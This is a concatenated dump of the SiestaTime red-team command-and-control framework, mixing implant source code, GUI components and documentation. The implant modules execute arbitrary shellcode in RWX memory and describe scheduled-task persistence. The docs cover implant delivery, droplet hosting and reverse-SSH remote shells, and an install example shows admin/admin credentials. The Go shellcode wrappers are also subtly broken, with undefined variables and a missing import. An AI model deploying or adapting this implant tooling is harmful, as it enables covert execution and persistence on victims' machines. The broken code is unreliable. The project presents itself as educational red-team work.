32 | 33 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows_x32.go: -------------------------------------------------------------------------------- 1 | // +build 386 2 | 3 | package windows_executeassembly_windows 4 | 5 | import ( 6 | 7 | "fmt" 8 | "io/ioutil" 9 | "os" 10 | "unsafe" 11 | 12 | ) 13 | 14 | 15 | /* 16 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 17 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x86/" -static 18 | #include "windows_executeassembly_windows.h" 19 | #include 20 | */ 21 | import "C" 22 | 23 | 24 | type BiExecuteAssembly struct { 25 | Shellcode string `json:"shellcode"` 26 | } 27 | 28 | var moduleParams *BiExecuteAssembly 29 | 30 | 31 | func ExecuteAssembly(jsonPersistence string,blob string) (bool,string){ 32 | 33 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 34 | if errDaws != nil{ 35 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 36 | } 37 | 38 | 39 | var ptrShellcode *C.char = C.CString(moduleParams.Shellcode) 40 | defer C.free(unsafe.Pointer(ptrShellcode)) 41 | 42 | var size_shellcode C.int = C.int(len(content)) 43 | 44 | 45 | ptrError := C.malloc(C.sizeof_char * 1024) 46 | defer C.free(unsafe.Pointer(ptrError)) 47 | 48 | C.ExecuteAssembly((*C.char)(ptrShellcode),size_shellcode,(*C.char)(ptrError)) 49 | 50 | errorString := C.GoString((*C.char)(ptrError)) 51 | if (error != 1){ 52 | 53 | return true,"Execute Assembly Error:" + string(errorString) 54 | } 55 | 56 | 57 | return false,"Assemly Executed" 58 | } 59 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows_x64.go: -------------------------------------------------------------------------------- 1 | // +build amd64 2 | 3 | package windows_executeassembly_windows 4 | 5 | import ( 6 | 7 | 
"fmt" 8 | "io/ioutil" 9 | "os" 10 | "unsafe" 11 | 12 | ) 13 | 14 | 15 | /* 16 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 17 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x64/" -static 18 | #include "windows_executeassembly_windows.h" 19 | #include 20 | */ 21 | import "C" 22 | 23 | 24 | type BiExecuteAssembly struct { 25 | Shellcode string `json:"shellcode"` 26 | } 27 | 28 | var moduleParams *BiExecuteAssembly 29 | 30 | 31 | func ExecuteAssembly(jsonPersistence string,blob string) (bool,string){ 32 | 33 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 34 | if errDaws != nil{ 35 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 36 | } 37 | 38 | 39 | var ptrShellcode *C.char = C.CString(moduleParams.Shellcode) 40 | defer C.free(unsafe.Pointer(ptrShellcode)) 41 | 42 | var size_shellcode C.int = C.int(len(content)) 43 | 44 | 45 | ptrError := C.malloc(C.sizeof_char * 1024) 46 | defer C.free(unsafe.Pointer(ptrError)) 47 | 48 | C.ExecuteAssembly((*C.char)(ptrShellcode),size_shellcode,(*C.char)(ptrError)) 49 | 50 | errorString := C.GoString((*C.char)(ptrError)) 51 | if (error != 1){ 52 | 53 | return true,"Execute Assembly Error:" + string(errorString) 54 | } 55 | 56 | 57 | return false,"Assemly Executed" 58 | } 59 | -------------------------------------------------------------------------------- /docs/install/client.rst: -------------------------------------------------------------------------------- 1 | Client 2 | =========================== 3 | 4 | 5 | Once Hive is Online, operators can connect to it, but they need to install their client first 6 | 7 | 8 | What this does? What is the Client 9 | ------------------------------------ 10 | 11 | GUI electron powered and Go application running in Operators' devices. The go client executable run a localhost server that feeds data to the electron app. 
In the same time, the go client executable authenticate against Hive with credentials passed in compiled time. 12 | Clients will authenticate against hive and send jobs to it. They can also interact with Post. Servers thanks to a Hive tunnelization system 13 | 14 | * Install Client OS dependencies 15 | * Use config.txt to get user credentials 16 | * Download Go and dependencies to compile client 17 | * Configure and install electron app 18 | 19 | 20 | 21 | Install 22 | ----------- 23 | 24 | Run ``stime.sh`` for client installation. This will compile stclient with provided credentials and configuration, and will generate the GUI folder. 25 | ``stime.sh install `` 26 | 27 | .. prompt:: bash $ 28 | 29 | ./stime.sh install admin admin 13.57.31.79 6232 8000 $(openssl x509 -fingerprint -sha256 -noout -in ./installConfig/hive.pem | cut -d '=' -f2) 30 | 31 | 32 | Run the Client 33 | --------------- 34 | 35 | 36 | .. prompt:: bash $ 37 | 38 | ./stime.sh 39 | 40 | Uninstall 41 | ----------- 42 | 43 | Will remove go dependencies 44 | ``./stime.sh remove`` 45 | 46 | -------------------------------------------------------------------------------- /docs/resources/domains.rst: -------------------------------------------------------------------------------- 1 | Domains 2 | =========================== 3 | 4 | Domains let the operator to add domain resources that can be used in the C2 deployment. Operators can list them to see if they are in use by any infrastructure already with the attribute ``active`` 5 | 6 | 7 | List Domain Info/Remove: ``Domains/SaaS --> example.xyz`` 8 | 9 | Add New domain: ``Domains/SaaS --> Add Domain`` 10 | 11 | 12 | Domain Status/Remove 13 | ----------------------- 14 | 15 | .. figure:: ../_static/images/addresources/domainstatus.png 16 | :align: center 17 | :figwidth: 600px 18 | :target: ../_static/images/addresources/domainstatus.png 19 | 20 | 21 | Godaddy 22 | ---------------- 23 | 24 | Keys --> `godaddykeys`_ 25 | 26 | 27 | .. 
figure:: ../_static/images/addresources/godaddy.png 28 | :align: center 29 | :figwidth: 600px 30 | :target: ../_static/images/addresources/godaddy.png 31 | 32 | 33 | Gmail 34 | ----------- 35 | 36 | * How to get my gmail connected App Credentials? 37 | * Create gmail Account 38 | * Follow instructions --> `goquickstart`_ 39 | * Put both ``credentials.json`` and ``token.json`` Strings 40 | 41 | 42 | 43 | .. figure:: ../_static/images/addresources/gmail.png 44 | :align: center 45 | :figwidth: 600px 46 | :target: ../_static/images/addresources/gmail.png 47 | 48 | 49 | .. note:: 50 | You need to specify the following gmail app access ``google.ConfigFromJSON(b, gmail.GmailModifyScope)`` 51 | 52 | .. _godaddykeys: https://developer.godaddy.com/keys/ 53 | .. _goquickstart: https://developers.google.com/gmail/api/quickstart/go -------------------------------------------------------------------------------- /src/client/electronGUI/components/jobs/jobs.js: -------------------------------------------------------------------------------- 1 | getJobs(); 2 | 3 | $(document).ready(function() { 4 | 5 | 6 | //Determine id of Job/Log component and load respective jobs/logs 7 | var id = $(".STmain").attr("id"); 8 | $(".STmain").find(".element").text(id); 9 | 10 | $(".STmain").find(".jtable").empty(); 11 | 12 | //Loop over Logs JSON DB and add Jogs related to parent summoning "id" (Bichito ID or "Hive") 13 | for (i = 0; i < jobs.length; i++){ 14 | var row = jobs[i]; 15 | if ((row.pid == id) || (row.chid == id)){ 16 | if (row.result.length >= 10000) { 17 | row.result = "Too Large Output - blob"; 18 | } 19 | $(".STmain").find(".jtable").append(""+htmlencode.htmlEncode(row.cid)+""+htmlencode.htmlEncode(row.jid)+""+htmlencode.htmlEncode(row.time)+""+htmlencode.htmlEncode(row.job)+""+htmlencode.htmlEncode(row.status)+""+htmlencode.htmlEncode(row.parameters)+"
"+htmlencode.htmlEncode(row.result)+"
"); 20 | } 21 | } 22 | 23 | 24 | //Used to show more info on click the table row 25 | if ($(".STmain").find('.table').length > 0) { 26 | $(".STmain").find('.table .header').on("click", function() { 27 | 28 | $(this).toggleClass("active", "").nextUntil('.header').css('display', function(i, v) { 29 | return this.style.display === 'table-row' ? 'none' : 'table-row'; 30 | }); 31 | }); 32 | } 33 | 34 | 35 | }) -------------------------------------------------------------------------------- /src/client/electronGUI/components/header/header.html: -------------------------------------------------------------------------------- 1 |
2 |
3 | Implants 4 |
5 |
6 |
7 | Redirectors 8 |
9 |
10 |
11 | Bichitos 12 |
13 |
14 |
15 | VPS 16 |
17 |
18 |
19 | Domains 20 |
21 |
22 |
23 | Stagings 24 |
25 |
26 |
27 | -------------------------------------------------------------------------------- /src/redirector/redMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Redirector Main }}}}}}} 2 | 3 | //// REdirector is the Modular Proxy software from SiestaTime Framework 4 | // A. main 5 | 6 | 7 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 8 | package main 9 | 10 | import ( 11 | "time" 12 | "bytes" 13 | "encoding/json" 14 | "math/rand" 15 | "strings" 16 | ) 17 | 18 | type Log struct { 19 | Pid string `json:"pid"` // Parent Id: Hive, R-/B- 20 | Time string `json:"time"` 21 | Error string `json:"error"` 22 | } 23 | 24 | 25 | func addLog(error string){ 26 | 27 | var( 28 | log Log 29 | job Job 30 | ) 31 | 32 | if !strings.Contains(rid,"R-"){ 33 | return 34 | } 35 | 36 | //Skip logs when there is a job/log overhead 37 | if len(jobsToHive.Jobs) > 10 { 38 | return 39 | } 40 | 41 | time := time.Now().Format("02/01/2006 15:04:05 MST") 42 | log = Log{rid,time,error} 43 | 44 | bufRP := new(bytes.Buffer) 45 | json.NewEncoder(bufRP).Encode(log) 46 | resultRP := bufRP.String() 47 | param := "["+resultRP+"]" 48 | 49 | //Mutex to avoid Race Conditions 50 | 51 | 52 | 53 | job = Job{"","",rid,"None","log","","","",param} 54 | jobsToHive.mux.Lock() 55 | jobsToHive.Jobs = append(jobsToHive.Jobs, &job) 56 | jobsToHive.mux.Unlock() 57 | 58 | return 59 | } 60 | 61 | func randomString(length int) string{ 62 | 63 | charset := "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 64 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 65 | b := make([]byte, length) 66 | for i := range b { 67 | b[i] = charset[seededRand.Intn(len(charset))] 68 | } 69 | 70 | return string(b) 71 | } -------------------------------------------------------------------------------- /docs/interactions/implants.rst: -------------------------------------------------------------------------------- 1 | 
Implants 2 | =========================== 3 | 4 | Once the Implants and Post. Servers are created, you have the infrastructure ready for a Red team operation. 5 | Now you are ready to download them for delivery purposes. 6 | 7 | Information 8 | -------------------------------------------- 9 | 10 | ``Implants --> ImplantName`` 11 | 12 | .. figure:: ../_static/images/interactions/listimplant.png 13 | :align: center 14 | :figwidth: 600px 15 | :target: ../_static/images/interactions/listimplant.png 16 | 17 | 18 | 19 | Download Implant 20 | -------------------------------------------------- 21 | 22 | Once the implant is listed, both the implant and redirector executables can be downloaded from Hive. 23 | 24 | ``Implants --> ImplantName --> Download`` 25 | 26 | .. figure:: ../_static/images/interactions/downloadimplant.png 27 | :align: center 28 | :figwidth: 600px 29 | :target: ../_static/images/interactions/downloadimplant.png 30 | 31 | 32 | .. note:: 33 | Every Download on Hive will be made to ``SiestaTime/installConfig/downloads`` 34 | 35 | 36 | Delivery - Attacks 37 | -------------------------------------------------- 38 | 39 | Once the implant is created, some Delivery options or “Attacks” will be available. In the future, delivery options like phishing, macro… will be available. 40 | 41 | Drop Implant 42 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 43 | 44 | To drop the implant, simply choose a previously created droplet. 45 | 46 | .. 
figure:: ../_static/images/interactions/implantwithindroplet.png 47 | :align: right 48 | :figwidth: 300px 49 | :target: ../_static/images/interactions/implantwithindroplet.png 50 | 51 | 52 | HTA 53 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 54 | ``TBD`` -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "windows_executeassembly_windows.h" 3 | #include 4 | #include 5 | 6 | 7 | std::string GetLastErrorAsString() 8 | { 9 | //Get the error message ID, if any. 10 | DWORD errorMessageID = ::GetLastError(); 11 | if (errorMessageID == 0) { 12 | return std::string(); //No error message has been recorded 13 | } 14 | 15 | LPSTR messageBuffer = nullptr; 16 | 17 | //Ask Win32 to give us the string version of that message ID. 18 | //The parameters we pass in, tell Win32 to create the buffer that holds the message for us (because we don't yet know how long the message string will be). 19 | size_t size = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 20 | NULL, errorMessageID, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&messageBuffer, 0, NULL); 21 | 22 | //Copy the error message into a std::string. 23 | std::string message(messageBuffer, size); 24 | 25 | //Free the Win32's string's buffer. 
26 | LocalFree(messageBuffer); 27 | 28 | return message; 29 | } 30 | 31 | int ExecuteAssembly(char* shellcode, int size_shellcode,char* error)//char* result,char* error) 32 | { 33 | 34 | void* exec = VirtualAlloc(0, size_shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | if (exec == NULL) { 36 | DWORD dwError = GetLastError(); 37 | sprintf(error, "VirtualAllocEx Error: %ld", dwError); 38 | return 0; 39 | } 40 | 41 | memcpy(exec, shellcode, size_shellcode); 42 | 43 | std::cout << "Pre exc" << std::endl; 44 | ((void(*)())exec)(); 45 | std::cout << "Post exc" << std::endl; 46 | 47 | return 1; 48 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/vps/vps.js: -------------------------------------------------------------------------------- 1 | 2 | $(document).ready(function() { 3 | 4 | 5 | //Determine if elog is for hive,red or bichito, then load the logs for each case 6 | var name = $(".STmain").attr("id"); 7 | 8 | $("#iname").text(htmlencode.htmlEncode(name)); 9 | $("#element").text(htmlencode.htmlEncode(name)); 10 | $("#delval").attr("value",htmlencode.htmlEncode(name)); 11 | 12 | for (i = 0; i < vps.length; i++){ 13 | if (vps[i].name == name){ 14 | var vpsi = vps[i]; 15 | } 16 | } 17 | 18 | $("#type").text(htmlencode.htmlEncode(vpsi.vtype)); 19 | 20 | 21 | }) 22 | 23 | /* 24 | type DeleteVps struct{ 25 | Name string `json:"name"` 26 | } 27 | */ 28 | $("#submitdelvps").on('click',function() { 29 | 30 | //Transform the array in one JSON STRING 31 | function objectifyForm(formArray) { 32 | var returnArray = {}; 33 | for (var i = 0; i < formArray.length; i++){ 34 | returnArray[formArray[i]['name']] = formArray[i]['value']; 35 | } 36 | return returnArray; 37 | } 38 | //Serialize form in the correct way 39 | 40 | var submitdelvpsJSON = objectifyForm($("#delvpsform").serializeArray()); 41 | //console.log(submitdelvpsJSON); 42 | 43 | //Create Job to send with two elements 44 | var data = 
{cid:"",jid:"",pid:"Hive",chid:"None",job:"deleteVPS",time:"",status:"",result:"",parameters:"["+JSON.stringify(submitdelvpsJSON)+"]"}; 45 | $.ajax({ 46 | type: "POST", 47 | url: "http://127.0.0.1:8000/job", 48 | data: JSON.stringify(data), 49 | contentType: "application/json; charset=utf-8", 50 | dataType: "json", 51 | success: function (response){ 52 | if (response != null){ 53 | 54 | return 55 | } 56 | } 57 | 58 | }); 59 | 60 | }); -------------------------------------------------------------------------------- /src/client/client.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Client Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | 4 | 5 | package main 6 | 7 | import ( 8 | "encoding/json" 9 | "bytes" 10 | "strings" 11 | "sync" 12 | ) 13 | 14 | 15 | // Define the Struct with a mutex to access the mem. shared Jobs to send to Hive 16 | type JobsToSend struct { 17 | mux sync.RWMutex 18 | Jobs []*Job 19 | } 20 | 21 | 22 | //On Compile variables: 23 | /* 24 | roasterString --> Domain/Ip of Hive 25 | fingerPrint --> TLS Fingerprint of target Hive Server TLS Certificate 26 | username --> Operator Credential 27 | password --> Operator Credential 28 | jobsToSend *JobsToSend --> Jobs array 29 | clientPort --> Port that will listen on localhost, and will receive electron requests 30 | */ 31 | var ( 32 | roasterString string 33 | fingerPrint string 34 | username string 35 | password string 36 | jobsToSend *JobsToSend 37 | clientPort string 38 | ) 39 | 40 | 41 | /* 42 | Description: Client Service Main Function 43 | Flow: 44 | A.Encode the Authenthication Header for login to Hive 45 | B.Initialize the "on-memory" Slice for the Jobs to be sent to Hive 46 | C.Start localhost handler for the GUI Interface 47 | */ 48 | func main() { 49 | 50 | //Create Auth Bearer with Operator credentials, that will be used in each request towards Hive 51 | tmp := UserAuth{username,password} 
52 | bufA := new(bytes.Buffer) 53 | json.NewEncoder(bufA).Encode(tmp) 54 | authbearer = strings.TrimSuffix(bufA.String(), "\n") 55 | 56 | //Initialize on memory slices for Send Jobs to Hive 57 | var jobs []*Job 58 | jobsToSend = &JobsToSend{Jobs:jobs} 59 | 60 | //Start Client Listener 61 | guiHandler() 62 | 63 | } -------------------------------------------------------------------------------- /src/bichito/modules/persistence/windows_schtasks.go: -------------------------------------------------------------------------------- 1 | // +build schtasks 2 | 3 | package persistence 4 | 5 | import ( 6 | "bichito/modules/persistence/windows_schtasks" 7 | ) 8 | 9 | 10 | /* 11 | Windows Persistence 12 | --> User-Mode 13 | --> SCHTASKS Persistence 14 | --> Triggered: User Login 15 | 16 | AddPersistence --> 17 | A.Decode JSON Persistence parameters 18 | B.Upload one of the parameters (the implant as a binary string blob) on target PATH (relative to user home) 19 | C.Using C++ (windows_schtasks.cpp), create a User-level schtasks, which on log-in execute target PATH executable file 20 | 21 | CheckPersistence --> 22 | A.Decode JSON Persistence parameters 23 | B.Execute accesschk on target PATH to check if Implant executable is present on disk 24 | 25 | RemovePersistence --> 26 | A.Decode JSON Persistence parameters 27 | B.Using C++ (windows_schtasks.cpp),, remove target name schtasks 28 | C.Spawn a process to kill the foothold process,sleep,and remove target PATH implant executable (previously persisted) 29 | */ 30 | 31 | func AddPersistence(jsonPersistence string,blob string) (bool,string){ 32 | 33 | err,result := windows_schtasks.AddPersistenceSchtasks(jsonPersistence,blob) 34 | if err != false { 35 | return true,result 36 | } 37 | 38 | return false,"Persisted" 39 | } 40 | 41 | func CheckPersistence(jsonPersistence string) (bool,string){ 42 | 43 | err,result := windows_schtasks.CheckPersistenceSchtasks(jsonPersistence) 44 | if err != false { 45 | return true,result 46 | } 47 | 
48 | return false,result 49 | } 50 | 51 | 52 | func RemovePersistence(jsonPersistence string) (bool,string){ 53 | 54 | err,result := windows_schtasks.RemovePersistenceSchtasks(jsonPersistence) 55 | if err != false { 56 | return true,result 57 | } 58 | 59 | return false,"Persistence Removed" 60 | } -------------------------------------------------------------------------------- /docs/misc/bugs.rst: -------------------------------------------------------------------------------- 1 | Known Bugs 2 | =========================== 3 | 4 | 5 | Client 6 | -------------------------- 7 | 8 | Job Creation - Stuck 9 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 10 | The client software implements a lock to avoid triggering too many jobs against Hive. This can still be faulty, leaving the lock stuck at 0. 11 | If this happens, a restart of the GUI/Client is recommended. 12 | 13 | Hive 14 | -------------------------------------------- 15 | 16 | Jobs Queue - GUI 17 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 18 | Hive executes jobs one by one. Once an output for each Job is produced, the Jobs will update. 19 | This means that while Hive is busy, operators will not see any updates on the client for sent jobs. 20 | 21 | DB Locked 22 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 23 | Multiple writes on the Hive DB have been shown to lock the DB and lose writes. 24 | This normally happens when multiple “Hive Jobs” are issued too close together. 25 | 26 | 27 | Redirector 28 | -------------------------------------------------- 29 | 30 | Uncommon problems are still known to occur in the redirector software. 31 | Deadlock is known to have happened in the past, but redirectors auto-restart if this happens. 32 | 33 | .. note:: 34 | Having several redirectors is recommended in case some of them fail. 35 | 36 | Bichito 37 | -------------------------------------------------- 38 | 39 | Uncommon problems are still known to occur in the implant/Bichito software. 40 | 41 | .. 
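note:: 42 | Persistence is recommended in the scenario where the bichito/implant software could block its functionality on unknown bugs 43 | 44 | 45 | Post. Servers 46 | -------------------------------------------------- 47 | 48 | .. note:: 49 | Faulty Staging/Post. Can be easily trashed and re-deployed. If the user feels any of them is becoming faulty, use the rapid deployment properties of STime to create it again.
-------------------------------------------------------------------------------- /src/bichito/biMisc.go: --------------------------------------------------------------------------------
//{{{{{{{ Hive Miscellaneous Functions and external sources }}}}}}}

//// Extra functions to help Hive with different tasks

//By Rebujacker - Alvaro Folgado Rueda as an open source educative project
package main

import (
	"bytes"
	"encoding/json"
	"math/rand"
	"strings"
	"sync"
	"time"
)

// Log is the JSON payload carried in the "parameters" field of a "log" Job.
type Log struct {
	Pid   string `json:"pid"` // Parent Id: Hive, R-/B-
	Time  string `json:"time"`
	Error string `json:"error"`
}

const (
	// maxQueuedJobs: once more than this many jobs are already waiting for
	// Hive, new log entries are dropped instead of growing the queue further.
	maxQueuedJobs = 10
	// maxLogBytes caps the size of one encoded log parameter (20 MB).
	maxLogBytes = 20000000
)

// Shared generator for randomString. It is seeded once: a generator seeded
// per call from time.Now().UnixNano() returns identical strings for calls
// that land in the same nanosecond. A *rand.Rand is not safe for concurrent
// use, so every access goes through seededRandMu.
var (
	seededRand   = rand.New(rand.NewSource(time.Now().UnixNano()))
	seededRandMu sync.Mutex
)

// addLog queues a "log" Job carrying msg so it is shipped to Hive with the
// other pending jobs. It is a no-op when bid does not carry the "B-" prefix
// (see Log.Pid) or when the outgoing queue is already saturated.
func addLog(msg string) {
	// jobsToHive is shared state: hold its lock across the length check and
	// the append so the two cannot interleave with another writer.
	jobsToHive.mux.Lock()
	defer jobsToHive.mux.Unlock()

	if !strings.Contains(bid, "B-") {
		return
	}

	// Skip logs when there is a job/log overhead.
	if len(jobsToHive.Jobs) > maxQueuedJobs {
		return
	}

	entry := Log{Pid: bid, Time: time.Now().Format("02/01/2006 15:04:05 MST"), Error: msg}

	var buf bytes.Buffer
	if err := json.NewEncoder(&buf).Encode(entry); err != nil {
		return // a log entry that cannot be encoded is simply dropped
	}
	param := "[" + buf.String() + "]"

	// Check that the size of the Result doesn't exceed 20 MB.
	if len(param) >= maxLogBytes {
		param = "This log was too long...Skipped to avoid crashes"
	}

	// Positional literal: field order is the Job struct's (cid, jid, pid, chid, job, ...).
	job := Job{"", "", "", bid, "log", "", "", "", param}
	jobsToHive.Jobs = append(jobsToHive.Jobs, &job)
}

// randomString returns a string of length characters drawn from [a-zA-Z0-9].
// A non-positive length yields "". math/rand is not a CSPRNG: if the result
// is ever used as a secret (key, token), switch to crypto/rand.
func randomString(length int) string {
	const charset = "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	if length <= 0 {
		return ""
	}
	b := make([]byte, length)
	seededRandMu.Lock()
	for i := range b {
		b[i] = charset[seededRand.Intn(len(charset))]
	}
	seededRandMu.Unlock()
	return string(b)
}
-------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/mixins.less: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | .fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | .fa-icon-rotate(@degrees, @rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation})"; 16 | -webkit-transform: rotate(@degrees); 17 | -ms-transform: rotate(@degrees); 18 | transform: rotate(@degrees); 19 | } 20 | 21 | .fa-icon-flip(@horiz, @vert, @rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation}, mirror=1)"; 23 | -webkit-transform: scale(@horiz, @vert); 24 | -ms-transform: scale(@horiz, @vert); 25 | transform: scale(@horiz, @vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 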
30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | .sr-only() { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | .sr-only-focusable() { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/vps/vps.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

VPS

6 | 12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 27 | 30 | 31 | 32 |
NameType
25 | 26 | 28 | 29 |
33 | 34 | 35 |
36 | 37 | Delete VPS 38 |
39 |
40 |
41 |
42 |
43 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/domain/domain.js: -------------------------------------------------------------------------------- 1 | 2 | $(document).ready(function() { 3 | 4 | 5 | //Determine if elog is for hive,red or bichito, then load the logs for each case 6 | var name = $(".STmain").attr("id"); 7 | 8 | $("#iname").text(htmlencode.htmlEncode(name)); 9 | 10 | $("#delval").attr("value",htmlencode.htmlEncode(name)); 11 | 12 | for (i = 0; i < domains.length; i++){ 13 | if (domains[i].name == name){ 14 | var domain = domains[i]; 15 | } 16 | } 17 | 18 | $("#type").text(htmlencode.htmlEncode(domain.dtype)); 19 | $("#domain").text(htmlencode.htmlEncode(domain.domain)); 20 | $("#active").text(htmlencode.htmlEncode(domain.active)); 21 | 22 | }) 23 | 24 | /* This Job will respect the following JSON Structure on "parameters": 25 | type DeleteDomain struct{ 26 | Name string `json:"name"` 27 | } 28 | */ 29 | 30 | $("#submitdeldomain").on('click',function() { 31 | 32 | //Transform the array in one JSON STRING 33 | function objectifyForm(formArray) { 34 | var returnArray = {}; 35 | for (var i = 0; i < formArray.length; i++){ 36 | returnArray[formArray[i]['name']] = formArray[i]['value']; 37 | } 38 | return returnArray; 39 | } 40 | 41 | //Serialize form in the correct way 42 | var submitdeldomainJSON = objectifyForm($("#deldomainform").serializeArray()); 43 | 44 | //Create Job to send with two elements 45 | var data = {cid:"",jid:"",pid:"Hive",chid:"None",job:"deleteDomain",time:"",status:"",result:"",parameters:"["+JSON.stringify(submitdeldomainJSON)+"]"}; 46 | 47 | $.ajax({ 48 | type: "POST", 49 | url: "http://127.0.0.1:8000/job", 50 | data: JSON.stringify(data), 51 | contentType: "application/json; charset=utf-8", 52 | dataType: "json", 53 | success: function (response){ 54 | if (response != null){ 55 | return 56 | } 57 | } 58 | 59 | }); 60 | 61 | }); 62 | 
-------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_mixins.scss: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | @mixin fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | @mixin fa-icon-rotate($degrees, $rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation})"; 16 | -webkit-transform: rotate($degrees); 17 | -ms-transform: rotate($degrees); 18 | transform: rotate($degrees); 19 | } 20 | 21 | @mixin fa-icon-flip($horiz, $vert, $rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}, mirror=1)"; 23 | -webkit-transform: scale($horiz, $vert); 24 | -ms-transform: scale($horiz, $vert); 25 | transform: scale($horiz, $vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | @mixin sr-only { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 
45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | @mixin sr-only-focusable { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /docs/deployment/postservers.rst: -------------------------------------------------------------------------------- 1 | Post. Servers 2 | =========================== 3 | 4 | 5 | .. figure:: ../_static/images/deployment/deploypost.png 6 | :align: center 7 | :figwidth: 600px 8 | :target: ../_static/images/deployment/deploypost.png 9 | 10 | Droplet 11 | -------------------------------------------- 12 | 13 | A plain ubuntu Server used to drop created Implants 14 | 15 | Name → Just the name of the resource 16 | VPS/Domain → Choose one from the battery 17 | Https Port 18 | Path for Implant folder → ``/var/www/”path”/implant`` 19 | Endpoint: ``https://domain/implantpath/implant`` 20 | 21 | .. figure:: ../_static/images/deployment/droplet.png 22 | :align: right 23 | :figwidth: 300px 24 | :target: ../_static/images/deployment/droplet.png 25 | 26 | Reverse SSH 27 | -------------------------------------------------- 28 | 29 | The reverse SSH will create a ubuntu Server with a sshd connection and a “anonymous” user configured with its own keys. 30 | This user is configured without a bash shell, the idea is that the implant will connect with that anonymous user and serve its own SSHD Server from Golang Code. 31 | 32 | In this way, what it looks from the foothold as a SSH outbound connection, will be a remote bash/cmd serving. 33 | ***[More details in developer Guide]*** 34 | 35 | 36 | .. 
